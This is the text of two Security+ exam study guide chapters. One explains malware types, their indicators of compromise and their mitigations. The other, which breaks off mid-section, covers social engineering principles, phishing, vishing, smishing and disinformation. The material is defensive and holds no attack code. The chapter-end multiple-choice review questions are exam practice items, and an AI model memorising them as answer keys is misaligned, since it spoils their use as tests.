Chapter3and4.pdf

Full Transcript

Chapter 3
Malicious Code

THE COMPTIA SECURITY+ EXAM OBJECTIVES
COVERED IN THIS CHAPTER INCLUDE:

Domain 2.0: Threats, Vulnerabilities, and
Mitigations
2.4. Given a scenario, analyze indicators of malicious
activity.
Malware attacks (Ransomware, Trojan, Worm,
Spyware, Bloatware, Virus, Keylogger, Logic bomb,
Rootkit)

Malware comes in many forms, from ransomware and worms to
spyware, viruses, keyloggers, and rootkits that help ensure that
attackers can retain access to systems once they've gained a foothold.
In this chapter, you will explore the various types of malware, as well
as the distinguishing elements, behaviors, and traits of each malware
type. You will learn about the indicators that you should look for, and
the response methods that organizations use to deal with each type
of malware, as well as controls that can help protect against them.

Malware
The term malware describes a wide range of software that is
intentionally designed to cause harm to systems and devices,
networks, or users. Malware can also gather information, provide
illicit access, and take a broad range of actions that the legitimate
owner of a system or network may not want to occur. The SY0-701
Security+ exam objectives include a number of the most common
types of malware, and you will need to be familiar with each of them,
how to tell them apart, how you can identify them, and common
techniques used in combatting them.

Exam Note

This objective introduces many types of malware and asks you to
analyze potential indicators to determine the type of attack.
When you tackle malware-based questions, you will need to know
the distinctive characteristics of each type of malware, and what
might help you tell them apart. For example, a Trojan is disguised
as legitimate software, whereas ransomware is aimed at getting
payment from a victim. As you read this section, remember to pay
attention to the differences between each type of malware, what
common indicators of compromise are associated with them, and
how you would answer questions about them on the exam!

Ransomware
Ransomware is malware that takes over a computer and then
demands a ransom. There are many types of ransomware, including
crypto malware, which encrypts files and then holds them hostage
until a ransom is paid. Other ransomware techniques include
threatening to report the user to law enforcement due to pirated
software or pornography, or threatening to expose sensitive
information or pictures from the victim's hard drive or device.
A significant portion of ransomware attacks are driven by phishing
campaigns, with unsuspecting victims installing malware delivered
via phishing emails or links in the email. That's not the only way that
ransomware is delivered as malicious actors continue to use direct
attack methods like Remote Desktop Protocol, vulnerable services, or
front-facing applications that they can compromise.
Indicators of compromise (IoCs) for ransomware include, but are not
limited to:

Command and control (C&C) traffic and/or contact to known
malicious IP addresses
 Use of legitimate tools in abnormal ways to retain control of the
compromised system
Lateral movement processes that seek to attack or gain
information about other systems or devices inside the same trust
boundaries
Encryption of files
Notices to end users of the encryption process with demands for
ransom
Data exfiltration behaviors, including large file transfers

You can read an example of a ransomware advisory
provided by the U.S. Cybersecurity & Infrastructure Security
Agency (CISA) about the Royal Ransomware variant, including a
detailed list of specific IoCs, at www.cisa.gov/news-
events/cybersecurity-advisories/aa23-061a.

One of the most important defenses against ransomware is an
effective backup system that stores files in a separate location that
will not be impacted if the system or device it backs up is infected
and encrypted by ransomware. Organizations that are preparing to
deal with ransomware need to determine what their response will be;
in some cases, paying ransoms has resulted in files being returned,
and in others attackers merely demanded more money.

Some ransomware has been defeated, and defenders
may be able to use a preexisting decryption tool to restore files.
Antivirus and antimalware providers as well as others in the
security community provide anti-ransomware tools.

Trojans
Trojans, or Trojan horses, are a type of malware that is typically
disguised as legitimate software. They are called Trojan horses
because they rely on unsuspecting individuals running them, thus
providing attackers with a path into a system or device. Figure 3.1
shows an example of a Trojan infection path starting with a user
downloading an application from the Android app store that appears
to be legitimate through automated download of malicious add-ons
and remote control of the device.
FIGURE 3.1 Trojan application download and infection process
An example of this type of malware is the Triada Trojan, which is
often distributed in the guise of a modified, feature-enhanced
WhatsApp version. When the application is launched, the Trojan
gathers information about the host device including device IDs,
subscriber IDs, and the device's hardware address. This information
is used to register the device with a remote server. With that
information ready, the Trojan is downloaded, decrypted, and run,
allowing further actions to take place depending on what the
malicious actor wants to occur. Those activities include everything
from displaying ads to signing up for paid subscriptions to services.
Indicators of compromise for Trojans often include:

Signatures for the specific malware applications or
downloadable files
Command and control system hostnames and IP addresses
Folders or files created on target devices
 A full writeup about the Triada Trojan that was
deployed via modified WhatsApp versions can be found at:
https://securelist.com/triada-trojan-in-whatsapp-mod/103679

And additional detail can be found here:
https://securelist.com/malicious-whatsapp-mod-distributed-
through-legitimate-apps/107690

In addition to traditional Trojans, remote access Trojans (RATs)
provide attackers with remote access to systems. Some legitimate
remote access tools are used as RATs, which can make it difficult
to identify whether a tool is a legitimate remote support tool or a
tool being used for remote access by an attacker. Antimalware
tools may also cause false positives when they find remote access
tools that may be used as RATs, but disabling this detection can
then result in RATs not being detected. Security practitioners
often combat Trojans and RATs using a combination of security
awareness training to encourage users not to download untrusted
software and antimalware or endpoint detection and response
(EDR) tools that detect Trojan and RAT-like behavior and known
malicious files.

Mitigation practices for Trojans typically starts with awareness
practices that help ensure that downloading and running Trojans are
less likely. Controlling the software and applications that users can
acquire can be a helpful option in many cases, but is often balanced
with the need to allow for flexibility for users. Anti-malware, EDR,
and other tools used to identify and stop malicious software from
running or which can discover it based on behavior and stop it are
also commonly used as a final line of defense.
 Bots, Botnets, and Command and Control

Many types of malware use command and control (C&C)
techniques and systems to allow attackers to tell them what to do.
These groups of systems that are under central command are
called botnets, and individual systems are called bots.
C&C increasingly uses encrypted HTTP connections, which are
then used to connect to a frequently changing set of remote hosts
to attempt to avoid observation, but use of Internet Relay Chat
(IRC) via port 6667 and similar techniques remain popular too.
As a defender you'll need to know how to search for C&C
communications and to identify why a system reaching out to
unknown hosts may be a sign of a system you're responsible for
being part of a botnet.

Worms
Unlike Trojans that require user interaction, worms spread
themselves. While worms are often associated with spreading via
attacks on vulnerable services, any type of spread via automated
means is possible, meaning that worms can spread via email
attachments, network file shares, vulnerable devices like IoT
(Internet of Things) and phones, or other methods as well. Worms
also self-install, rather than requiring users to click on them, making
them quite dangerous.
 Stuxnet: Nation-State-Level Worm Attacks

The 2010 Stuxnet attack is generally recognized as the first
implementation of a worm as a cyber weapon. The worm was
aimed at the Iranian nuclear program, and copied itself to thumb
drives to bypass air-gapped (physically separated systems
without a network connection) computers. Stuxnet took
advantage of a number of advanced techniques for its time,
including using a trusted digital certificate, searching for specific
industrial control systems (ICSs) that were known to be used by
the Iranian nuclear program, and specific programming to attack
and damage centrifuges while providing false monitoring data to
controllers to ensure that the damage would not be noticed until
it was too late.
While Stuxnet was specifically designed to bypass physically
separated networks, firewalls and network-level controls remain
one of the best ways to mitigate worm attacks. If compromised
devices cannot communicate with other vulnerable devices, the
infection can't spread!
You can read about Stuxnet in more depth at
www.wired.com/2014/11/countdown-to-zero-day-stuxnet

https://spectrum.ieee.org/the-real-story-of-stuxnet

An example of a modern worm is Raspberry Robin, a worm that is
used as part of pre-ransomware activity. Raspberry Robin's spread
was initially through infected USB drives using a LNK file. Once
running, it uses built-in Windows tools to accomplish further tasks
and to obtain persistency, ensuring it will survive past reboots.
Common IoCs for worms like Raspberry Robin include:

Known malicious files
Downloads of additional components from remote systems
Command and control contact to remote systems
 Malicious behaviors using system commands for injection and
other activities, including use of cmd.exe, msiexec.exe, and
others
Hands-on-keyboard attacker activity

Microsoft provides a detailed write-up of the
Raspberry Robin worm, including recommendations for
defensive actions to be taken, at
www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-
robin-worm-part-of-larger-ecosystem-facilitating-pre-
ransomware-activity

Mitigating worm infections frequently starts with effective network-
level controls focused on preventing infection traffic. Firewalls, IPS
devices, network segmentation, and similar controls are the first
layer of defense. Patching and configuring services to limit attack
surfaces is also a best practice for preventing worms. After an
infection responses may include use of antimalware, EDR, and
similar tools to stop and potentially remove infections. Depending on
the complexity of the malware, removal may be nearly impossible,
and as with many types of malware reinstallation or resetting to
original firmware may be required for some devices.

Spyware
Spyware is malware that is designed to obtain information about an
individual, organization, or system. Various types of spyware exist,
with different types of information targeted by each. Many spyware
packages track users' browsing habits, installed software, or similar
information and report it back to central servers. Some spyware is
relatively innocuous, but malicious spyware exists that targets
sensitive data, allows remote access to web cameras, or otherwise
provides illicit or undesirable access to the systems it is installed on.
Spyware is associated with identity theft and fraud, advertising and
redirection of traffic, digital rights management (DRM) monitoring,
and with stalkerware, a type of spyware used to illicitly monitor
partners in relationships.
Spyware is most frequently combated using antimalware tools,
although user awareness can help prevent the installation of spyware
that is included in installers for software (thus acting as a form of
Trojan), or through other means where spyware may appear to be a
useful tool or innocuous utility.
Spyware comes in many forms, which means that its IoCs can be very
similar to other malicious software types. Common examples of
spyware IoCs include:

Remote-access and remote-control-related indicators
Known software file fingerprints
Malicious processes, often disguised as system processes
Injection attacks against browsers

Since spyware uses techniques from other types of malware, defining
software as spyware typically requires understanding its use and
motivations rather than just its behavior. Thus, spyware may use
Trojan, worm, or virus-style propagation methods in some cases, but
the intent is to gather information about a user or system, with the
methods used being less important than the goal.
Mitigation practices for spyware focus on awareness, control of the
software that is allowed on devices and systems, and antispyware
capabilities built into antimalware tools. Since spyware is generally
perceived as less of a threat than many types of malware, it is
commonly categorized separately and may require specific
configuration to identify and remove it.
 An example of a commercialized spyware tool is
NSO Group's Pegasus spyware tool. Amnesty International
provides a thorough write-up of indicators and actions taken by
Pegasus here:
www.amnesty.org/en/latest/research/2021/07/forensic-
methodology-report-how-to-catch-nso-groups-pegasus

Bloatware
If you have ever purchased a new computer and discovered
preinstalled applications that you didn't want on it, you've
encountered bloatware. The term bloatware is an all-encompassing
term used to describe unwanted applications installed on systems by
manufacturers. They may be part of a commercial relationship the
manufacturer has, they may be programs the manufacturer
themselves provide, or they may come later and be part of installer
packages for other applications.
Unlike the other malicious software categories listed in this chapter,
bloatware isn't usually intentionally malicious. It may, however, be
poorly written, may call home with information about your system or
usage, or may prove to be vulnerable to exploitation, adding another
attack surface to otherwise secure devices. Uninstalling bloatware or
using a clean operating system image are common practices for
organizations as well as individuals.
Since bloatware isn't really malicious software, it isn't typically
associated with IoCs. Instead it should simply be removed to prevent
issues—including simply taking up disk space, memory, and CPU
cycles without providing any benefit. Mitigation techniques for
bloatware focus on awareness and uninstallation or removal of the
software.
 Exam Note

The Security+ exam outline calls out spyware and bloatware, but
they can sometimes be difficult to tell apart since manufacturers
who install bloatware often have call-home functionality built
into the bloatware. The key differentiator is that spyware's
primary intention is to gather information about the user, their
use of the system and Internet, and the configuration of the
system, whereas bloatware is simply unwanted programs.

Viruses
Computer viruses are malicious programs that self-copy and self-
replicate once they are activated. Unlike worms, they don't spread
themselves via vulnerable services and networks. Viruses require one
or more infection mechanisms that they use to spread themselves,
like copying to a thumb drive or network share, and that mechanism
is typically paired with some form of search capability to find new
places to spread to once they are run. Viruses also typically have both
a trigger, which sets the conditions for when the virus will execute,
and a payload, which is what the virus does, delivers, or the actions
it performs. Viruses come in many varieties, including:

Memory-resident viruses, which remain in memory while the
system of the device is running
Non-memory-resident viruses, which execute, spread, and then
shut down
Boot sector viruses, which reside inside the boot sector of a drive
or storage media
Macro viruses, which use macros or code inside word processing
software or other tools to spread
Email viruses that spread via email either as email attachments
or as part of the email itself using flaws inside email clients
Fileless virus attacks are similar to traditional viruses in a number of
critical ways. They spread via methods like spam email and malicious
websites and exploit flaws in browser plug-ins and web browsers
themselves. Once they successfully find a way into a system, they
inject themselves into memory and conduct further malicious
activity, including adding the ability to reinfect the system via the
same process at reboot through a Registry entry or other technique.
At no point do they require local file storage, as they remain memory
resident throughout their entire active life—in fact, the only stored
artifact of many fileless attacks would be the artifacts of their
persistence techniques like the Registry entry shown in Figure 3.2.

FIGURE 3.2 Fileless virus attack chain
As you might expect from the infection flow diagram in Figure 3.2,
fileless attacks require a vulnerability to succeed, so ensuring that
browsers, plug-ins, and other software that might be exploited by
attackers are up to date and protected can prevent most attacks.
Using antimalware tools that can detect unexpected behavior from
scripting tools like Microsoft PowerShell can also help stop fileless
viruses. Finally, network level defenses like intrusion prevention
systems (IPSs), as well as reputation-based protection systems can
prevent potentially vulnerable systems from browsing known
malicious sites.
IoCs related to viruses are often available in threat feeds from
organizations like VirusTotal, where recently discovered viruses and
their behaviors are analyzed and indexed to create IoC feeds. You can
find examples of VirusTotal's crowdsourced YARA rules in their
support article about their community YARA feed dashboard at
https://support.virustotal.com/hc/en-us/articles/9853517705117-
Crowdsourced-YARA-rules-dashboard.
Mitigation for viruses includes both awareness that helps to prevent
users from clicking on and activating viruses as well as antimalware
tools that can detect them and prevent them both on-disk and in-
memory or as they are being executed. Removal varies, with some
viruses easy to remove using antimalware tools or dedicated, virus-
specific utilities while some may require more significant action.

Removing malware can be a challenging task. It can
be nearly impossible to determine if every part of a complex
infection has been removed. Although it may be tempting to rely
on your antivirus or other security tools to remove the infection,
that often isn't sufficient.
Due to this, many organizations have a standard practice of
wiping the drive of an infected machine and restoring it from a
known good backup or reinstalling/reimaging it. While there are
some scenarios where even that won't be enough, such as with
BIOS/UEFI resident malware, in most common scenarios a
complete wipe and reinstallation or reimaging will ensure the
malware is gone.

Keyloggers
Keyloggers are programs that capture keystrokes from a keyboard,
although keylogger applications may also capture other input such as
mouse movement, touchscreen inputs, or credit card swipes from
attached devices. Keyloggers work in a multitude of ways, ranging
from tools that capture data from the kernel, via APIs or scripts, or
even directly from memory. Regardless of how they capture data, the
goal of a keylogger is to capture user input to be analyzed and used
by an attacker.
Preventing software keylogging typically focuses on normal security
best practices to ensure that malware containing a keylogger is not
installed, including patching and systems management, as well as
use of antimalware tools. Since many keyloggers are aimed at
acquiring passwords, use of multifactor authentication can help limit
the impact of a keylogger, even if it cannot defeat the keylogger itself.
In more complex security environments where underlying systems
cannot be trusted, use of bootable USB drives can prevent use of a
potentially compromised underlying operating system.
Much like other malicious software intended to gather information,
IoCs related to keyloggers are commonly:

File hashes and signatures
Exfiltration activity to command and control systems
Process names
Known reference URLs

An example of an analysis of keylogger delivery campaign via PDFs
can be found at www.socinvestigation.com/pdf-campaign-delivering-
snake-keylogger.

In addition to the software-based keyloggers we
discussed here, hardware keyloggers are also available and
inexpensive. The authors of this book have encountered them on
college campuses where students tried to acquire (and in some
cases succeeded) credentials for their instructors so that they
could change their grades.

Logic Bombs
Logic bombs, unlike the other types of malware described here, are
not independent malicious programs. Instead, they are functions or
code placed inside other programs that will activate when set
conditions are met. Some other types of malware may use this type of
code as part of their function as well. While relatively rare compared
to other types of malware, logic bombs are a consideration in
software development and systems management, and can have a
significant impact if they successfully activate.
Since logic bombs are found in code, IoCs for logic bombs are less
common—they require analysis of the code or logic in the
application, meaning that mitigation processes are also primarily
focused on code review.

Analyzing Malware

A number of techniques are commonly used to analyze malware:

Online analysis tools like VirusTotal can be used to check
whether the malware is a known tool and to see what it is
identified as by multiple AV tools.
Sandbox tools can be used to analyze malware behavior in a
protected environment.
Manual code analysis is common, particularly with scripts
and interpreted code like Python and Perl.
Malware can be analyzed using tools like strings to look for
recoverable artifacts that may be useful for the analysis

Many other tools and techniques are used to analyze malicious
code and software, but these are a good starting point for security
analysts who need to determine whether a given executable or
block of code might be malicious.

Rootkits
Rootkits are malware that is specifically designed to allow attackers
to access a system through a backdoor. Many modern rootkits also
include capabilities that work to conceal the rootkit from detection
through any of a variety of techniques, ranging from hooking
filesystem drivers to ensure that users cannot see the rootkit files to
infecting startup code in the Master Boot Record (MBR) of a disk,
allowing attacks against full-disk encryption systems.
Rootkit detection can be challenging, because a system infected with
malware like this cannot be trusted. That means that the best way to
detect a rootkit is to test the suspected system from a trusted system
or device. In cases where that isn't possible, rootkit detection tools
look for behaviors and signatures that are typical of rootkits.
Techniques like integrity checking and data validation against
expected responses can also be useful for rootkit detection, and anti-
rootkit tools often use a combination of these techniques to detect
complex rootkits.
Once a rootkit is discovered, removal can be challenging. While some
antimalware and anti-rootkit tools are able to remove specific
rootkits, the most common recommendation whenever possible is to
rebuild the system or to restore it from a known good backup. As
virtual machines, containers, system imaging, and software-defined
environments have become more common, this has simplified
restoration processes, and in many cases may be as fast, or faster
than ensuring that a system infected with a rootkit has been properly
and fully cleaned.

Some rootkits are intentionally installed, either as
part of DRM systems or as part of anti-cheating toolkits for
games, or because they are part of a tool used to defeat copy
protection mechanisms. While these tools are technically
rootkits, you will normally be focused on tools used by malicious
actors instead of intentional installation for purposes like these.

Like many of the other malware types, the best way to prevent
rootkits is to use normal security practices, including patching, use of
secure configurations, and ensuring that privilege management is
used. Tools like Secure Boot and techniques that can validate live
systems and files can also be used to help prevent rootkits from being
successfully installed or remaining resident.
Common IoCs for rootkits include:

File hashes and signatures
Command and control domains, IP addresses, and systems
 Behavior-based identification like the creation of services,
executables, configuration changes, file access, and command
invocation
Opening ports or creation of reverse proxy tunnels

An example of a rootkit used on automatic teller machines (ATMs)
with example indicators can be found here:
www.socinvestigation.com/unc2891-atm-rootkit-mandiant-advanced-
practices-team-tracks-latest-indicators

Since rootkits are specifically designed to avoid detection, mitigation
can be particularly challenging. While antimalware and similar tools
can sometimes gain an edge in detecting rootkits, detection and
removal can be difficult to ensure. Preventing rootkits from being
installed by taking proactive action to secure systems and prevent
malicious activity is a key element of rootkit mitigation.

Since rootkits often invade operating systems and
use hooks to make the operating system help hide them, one
technique that can help to find them is to remove the drive and
connect it to another system. This means that the infected
operating system won't be running and that the tool may be
revealed. Similar techniques can be accomplished through system
images or snapshots of virtual machines.

Summary
Security professionals need to be aware of the most common forms
of malware. This includes understanding how to identify common
indicators of malicious activity related to malware attacks and
malware itself.
The Security+ exam objectives focus on a few different types of
malware. These include ransomware, which most frequently targets
victims by encrypting files and holding them for ransoms paid via
cryptocurrency. Trojans are malware that is disguised to look like
legitimate software but that takes malicious action once downloaded
and run.
Worms are malware that spread themselves on networks via
vulnerable services, email, or file shares. Viruses are similar but only
infect local systems and often require user action like running an
application to infect a system.
Spyware is malicious software that is intended to gather information
about users, systems, and networks. It then sends that information
back to remote systems or command and control servers. Keyloggers
are a specialized type of spyware that capture keystrokes, allowing
malicious actors to know what you've typed. Keyloggers exist in both
software and hardware form, although the Security+ exam focuses
on them as malware.
Rootkits are used to retain access to a system and are commonly part
of an attacker's toolkits as well as being used together with other
malware to help keep a foothold on a compromised system. Rootkits
are designed to conceal malicious action and to counter protective
measures like antivirus, antimalware, and endpoint detection and
response tools.
Logic bombs are code that executes under a specific condition or
conditions, taking unwanted action. Unlike the other malware on
this list, logic bombs typically need to be identified by reviewing
source code or scripts.
Bloatware is simply unwanted software installed on systems by
vendors or as part of software packages. Bloatware takes up
resources like disk space, memory, and CPU cycles. It isn't truly
malicious software but is often vulnerable to attack and can allow
actual malicious software to gain access to systems. Bloatware is
typically removed by uninstalling it.
Finally, there are many ways to fight malware, from antivirus and
endpoint detection and response tools to configuration and patching.
Awareness is often the most effective tool in an organization's
arsenal as it can help prevent attacks, can allow responses to occur
more quickly, and can help limit the impact of human mistakes
throughout malware life cycles and attacks.
Exam Essentials
Understand and explain the different types of malware.
Malware includes ransomware, Trojans, worms, spyware, bloatware,
viruses, keyloggers, logic bombs, and rootkits. Each type of malware
has distinctive elements, and security analysts need to know what
identifies each type of malware, how to identify it, what controls are
commonly deployed against it, and what to do if you encounter it.
Explain common indicators of malicious activity associated
with malware types. Indicators of compromise associated with
malware vary based on the type of malware and how it is designed
and used. Common examples of IoCs associated with malware
include command and control (C&C) traffic patterns, IP addresses,
hostnames, and domains. Use of system utilities in unexpected ways,
lateral movement between systems, creation of files and directories,
encryption of files, and data exfiltration are also commonly seen,
particularly with Trojans and rootkits. Signatures for malware are
commonly used to identify specific files associated with given
malware packages although malware writers use defensive
techniques intended to make this harder.
Understand the methods to mitigate malware. Malware
may require specialized techniques and processes to remove it or to
deal with the impact of the malware. Techniques range from manual
removal to the use of tools to identify and remove malicious files,
and often rely on reinstallation of a system or restoration from a
known good backup to ensure all malware is removed.

Review Questions
1. Ryan wants to prevent logic bombs created by insider threats
from impacting his organization. What technique will most
effectively limit the likelihood of logic bombs being put in place?
A. Deploying antivirus software
B. Using a code review process
C. Deploying endpoint detection and response (EDR) software
D. Disabling autorun for USB drives
2. Yasmine believes that her organization may be dealing with an
advanced rootkit and wants to write IoC definitions for it. Which
of the following is not likely to be a useful IoC for a rootkit?
A. File hashes
B. Command and control domains
C. Pop-ups demanding a ransom
D. Behavior-based identifiers
3. Nathan works at a school and notices that one of his staff
appears to have logged in and changed grades for a single
student to higher grades, even in classes that staff member is not
responsible for. When asked, the staff member says that they did
not perform the action. Which of the following is the most likely
way that a student could have gotten access to the staff
member's password?
A. A keylogger
B. A rootkit
C. Spyware
D. A logic bomb
4. Amanda notices traffic between her systems and a known
malicious host on TCP port 6667. What type of traffic is she
most likely detecting?
A. Command and control
B. Spyware
C. A worm
D. A hijacked web browser
5. Mike discovers that attackers have left software that allows them
to have remote access to systems on a computer in his
company's network. How should he describe or classify this
malware?
A. A worm
B. Crypto malware
 C. A trojan
D. A backdoor
6. What is the primary impact of bloatware?
A. Consuming resources
B. Logging keystrokes
C. Providing information about users and devices to third
parties
D. Allowing unauthorized remote access
7. What type of malware is used to gather information about a
user's browsing habits and system?
A. A Trojan
B. Bloatware
C. Spyware
D. A rootkit
8. Matt uploads a malware sample to a third-party malware
scanning site that uses multiple antimalware and antivirus
engines to scan the sample. He receives multiple different
answers for what the malware package is. What has occurred?
A. The package contains more than one piece of malware.
B. The service is misconfigured.
C. The malware is polymorphic and changed while being
tested.
D. Different vendors use different names for malware
packages.
9. Nancy is concerned that there is a software keylogger on the
system she's investigating. What best describes data that may
have been stolen?
A. All files on the system
B. All keyboard input
C. All files the user accessed while the keylogger was active
 D. Keyboard and other input from the user
10. A system in Elaine's company has suddenly displayed a message
demanding payment in Bitcoin and claiming that the data from
the system has been encrypted. What type of malware has Elaine
likely encountered?
A. Worms
B. A virus
C. Ransomware
D. Rootkit
11. Rick believes that a system he is responsible for has been
compromised with malware that uses a rootkit to obtain and
retain access to the system. When he runs an antimalware tool's
scanner, the system doesn't show any malware. If he has other
data that indicates the system is infected, what should his next
step be if he wants to determine what malware may be on the
system?
A. Rerun the antimalware scan.
B. Mount the drive on another system and scan it that way.
C. Disable the systems antivirus because it may be causing a
false negative.
D. The system is not infected and he should move on.
12. A recently terminated developer from Jaya's organization has
contacted the organization claiming that they left code in an
application that they wrote that will delete files and bring the
application down if they are not employed by the company.
What type of malware is this?
A. Ransomware
B. Extortionware
C. A logic bomb
D. A Trojan
13. Selah wants to ensure that malware is completely removed from
a system. What should she do to ensure this?
 A. Run multiple antimalware tools and use them to remove all
detections.
B. Wipe the drive and reinstall from known good media.
C. Use the delete setting in her antimalware software rather
than the quarantine setting.
D. There is no way to ensure the system is safe and it should be
destroyed.
14. What is the key difference between a worm and a virus?
A. What operating system they run on
B. How they spread
C. What their potential impact is
D. The number of infections
15. Ben wants to analyze Python code that he believes may be
malicious code written by an employee of his organization. What
can he do to determine if the code is malicious?
A. Run a decompiler against it to allow him to read the code
B. Open the file using a text editor to review the code
C. Test the code using an antivirus tool
D. Submit the Python code to a malware testing website
16. Which of the following defenses is most likely to prevent Trojan
installation?
A. Installing patches for known vulnerabilities
B. Preventing downloads from application stores
C. Preventing the use of USB drives
D. Disabling autorun from USB drives
17. Jason's security team reports that a recent WordPress
vulnerability seems to have been exploited by malware and that
their organization's entire WordPress service cluster has been
infected. What type of malware is most likely involved if a
vulnerability in the software was exploited over the network?
 A. A logic bomb
B. A Trojan
C. A worm
D. A rootkit
18. Hui's organization recently purchased new Windows computers
from an office supply store. The systems have a number of
unwanted programs on them that load at startup that were
installed by the manufacturer. What type of software is this?
A. Viruses
B. Trojans
C. Spyware
D. Bloatware
19. What type of malware connects to a command and control
system, allowing attackers to manage, control, and update it
remotely?
A. A bot
B. A drone
C. A vampire
D. A worm
20. Randy believes that a system that he is responsible for was
infected after a user picked up a USB drive and plugged it in.
The user claims that they only opened one file on the drive to see
who might own it. What type of malware is most likely involved?
A. A virus
B. A worm
C. A trojan
D. A spyware tool
Chapter 4
Social Engineering and Password Attacks

THE COMPTIA SECURITY+ EXAM OBJECTIVES
COVERED IN THIS CHAPTER INCLUDE:

Domain 2.0: Threats, Vulnerabilities, and
Mitigations
2.2. Explain common threat vectors and attack surfaces.
Human vectors/social engineering (Phishing, Vishing,
Smishing, Misinformation/disinformation,
Impersonation, Business email compromise,
Pretexting, Watering hole, Brand impersonation,
Typosquatting).
2.4. Given a scenario, analyze indicators of malicious
activity.
Password attacks (Spraying, Brute force)

Social engineering techniques focus on the human side of
information security. Using social engineering techniques, security
professionals and attackers can accomplish a variety of tasks ranging
from acquiring information to gaining access to buildings, systems,
and networks.
This chapter explores social engineering techniques and related
practices, from phishing to typosquatting. We discuss the principles
that underlie social engineering attacks, as well as how modern
influence campaigns use social engineering concepts and social
media to sway opinions and reactions. Social engineering and
phishing attacks often precede password attacks, and later in this
chapter you will review password attack methods like brute-force
attacks and password spraying.
Social Engineering and Human Vectors
Social engineering is the practice of manipulating people through a
variety of strategies to accomplish desired actions. Social engineers
work to influence their targets to take actions that they might not
otherwise have taken.
A number of key principles are leveraged to successfully social
engineer an individual. Although the list of principles and their
names vary depending on the source you read, a few of the most
common are:

Authority, which relies on the fact that most people will obey
someone who appears to be in charge or knowledgeable,
regardless of whether or not they actually are. A social engineer
using the principle of authority may claim to be a manager, a
government official, or some other person who would have
authority in the situation they are operating in.
Intimidation relies on scaring or bullying an individual into
taking a desired action. The individual who is targeted will feel
threatened and respond by doing what the social engineer wants
them to do.
Consensus-based social engineering uses the fact that people
tend to want to do what others are doing to persuade them to
take an action. A consensus-based social engineering attack
might point out that everyone else in a department had already
clicked on a link, or might provide fake testimonials about a
product making it look safe. Consensus is called “social proof” in
some categorization schemes.
Scarcity is used for social engineering in scenarios that make
something look more desirable because it may be the last one
available.
Familiarity-based attacks rely on you liking the individual or
even the organization the individual is claiming to represent.
Trust, much like familiarity, relies on a connection with the
individual they are targeting. Unlike with familiarity, which
relies on targets thinking that something is normal and thus
 familiar, social engineers who use this technique work to build a
connection with their targets so that they will take the actions
that they want them to take.
Urgency relies on creating a feeling that the action must be
taken quickly due to some reason or reasons.

You may have noticed that each of these social engineering principles
works because it causes the target to react to a situation and that
many make the target nervous or worried about a result or scenario.
Social engineering relies on human reactions, and we are most
vulnerable when we are responding instead of thinking clearly.
Many, if not most, social engineering efforts in the real world
combine multiple principles into a single attack. If a penetration
tester calls, claiming to be a senior leader's assistant in another part
of your company (thus leading authority and possibly familiarity
responses), and then insists that that senior leader has an urgent
need (urgency) and informs their target that they could lose their job
if they don't do something immediately (intimidation), they are more
likely to be successful in many cases than if they only used one
principle. A key part of social engineering is understanding the
target, how humans react, and how stress reactions can be leveraged
to meet a goal.

Exam Note

The Security+ exam doesn't expect you to be able to categorize
attacks based on the principles they rely on, but those principles
are extremely helpful as a tool to think about why an attack might
succeed and how it can be prevented or limited.

Social Engineering Techniques
Social engineering involves more than the principles you just read.
There are both technical and nontechnical attacks that leverage those
principles to get results that are desired by both attackers and
penetration testers. As a security professional, you need to be aware
of these techniques, what they involve, and what makes each of them
different from the others.

Phishing
Phishing is a broad term used to describe the fraudulent acquisition
of information, often focused on credentials like usernames and
passwords, as well as sensitive personal information like credit card
numbers and related data. Phishing is most often done via email, but
a wide range of phishing techniques exist, including things like
smishing, which is phishing via SMS (text) messages, and vishing, or
phishing via telephone.
Specific terms are also used for specific targeting of phishing
attempts. Spear phishing targets specific individuals or groups in an
organization in an attempt to gather desired information or access.
Whaling, much like spear phishing, targets specific people, but
whaling is aimed at senior employees like CEOs and CFOs—“big fish”
in the company, thus the term whaling.
Like most social engineering techniques, one of the most common
defenses against phishing of all types is awareness. Teaching staff
members about phishing and how to recognize and respond to
phishing attacks, and even staging periodic exercises, are all
common means of decreasing the risk of successful phishing attacks.
Technical means also exist, including filtering that helps prevent
phishing using reputation tools, keyword and text pattern matching,
and other technical methods of detecting likely phishing emails,
calls, or texts.

Vishing
Vishing is phishing accomplished via voice or voicemail messages.
Vishing attacks rely on phone calls to social-engineer targets into
disclosing personal, financial, or other useful information, or to send
funds. Common vishing scams include requests to help a relative or
friend in another country, leading to wire fraud; various tax scams,
particularly during tax season in the United States; threats of law
enforcement action; and requests for a staff member to perform a
task for a senior executive.
Like many social engineering efforts, vishing often relies on a sense
of urgency, with an imminent threat or issue that needs to be
resolved. Vishers may attempt to acquire personal information, and
frequently present themselves as authorities.

Smishing
Smishing relies on text messages as part of the phishing scam.
Whereas other scams often rely on targets disclosing information via
social engineering, smishing scams frequently attempt to get users to
click on a link in a text message. The link may take them to a fake site
to capture credentials, may attempt to infect the recipient's phone
with malware, may request multifactor authentication (MFA)
information like an SMS code, or could target some other
information or action.
Smishing attacks rely on similar pretexts to many other phishing
attacks with attempts to build trust or urgency, or to establish
authority often included as part of the messages.

Misinformation and Disinformation
As cyberwarfare and traditional warfare have continued to cross over
in deeper and more meaningful ways, online influence campaigns—
which have traditionally focused on social media, email, and other
online-centric mediums—have become common and have
increasingly been used by governments and other groups as part of
misinformation and disinformation campaigns. A very visible
example was the influence campaigns targeting political campaigns
that were a major topic in the U.S. 2016 and 2020 elections,
resulting in a growing public awareness of the issue.
It can be a bit confusing distinguishing between misinformation and
disinformation. Remember that misinformation is incorrect
information, often resulting from getting facts wrong.
Disinformation is incorrect, inaccurate, or outright false information
that is intentionally provided to serve an individual or organization's
goals.
Individuals and organizations conduct influence campaigns to turn
public opinion in directions of their choosing. Even advertising
campaigns can be considered a form of influence campaign, but in
general, most influence campaigns in the context of the Security+
exam are associated with disinformation and misinformation
campaigns.

Another term you may encounter in this context is
“malinformation.” These three types of information are
sometimes abbreviated as “MDM” or misinformation,
disinformation, and malinformation. CISA provides a guide on
them at www.cisa.gov/sites/default/files/publications/mdm-
incident-response-guide_508.pdf.

The CISA recommends a five-step “TRUST” process to counter
misinformation and disinformation campaigns:

1. Tell your story.
2. Ready your team.
3. Understand and assess MDM.
4. Strategize response.
5. Track outcomes.

Misinformation campaigns can appear quickly, and their source can
be hard to identify. That means that organizations must monitor for
misinformation and be ready to counter them using actions like
those described in the TRUST model. The CISA's recommendations
for preparedness include assessing the information environment,
identifying vulnerabilities, fortifying communication channels,
engaging in proactive communications, and developing an incident
response plan.

Impersonation
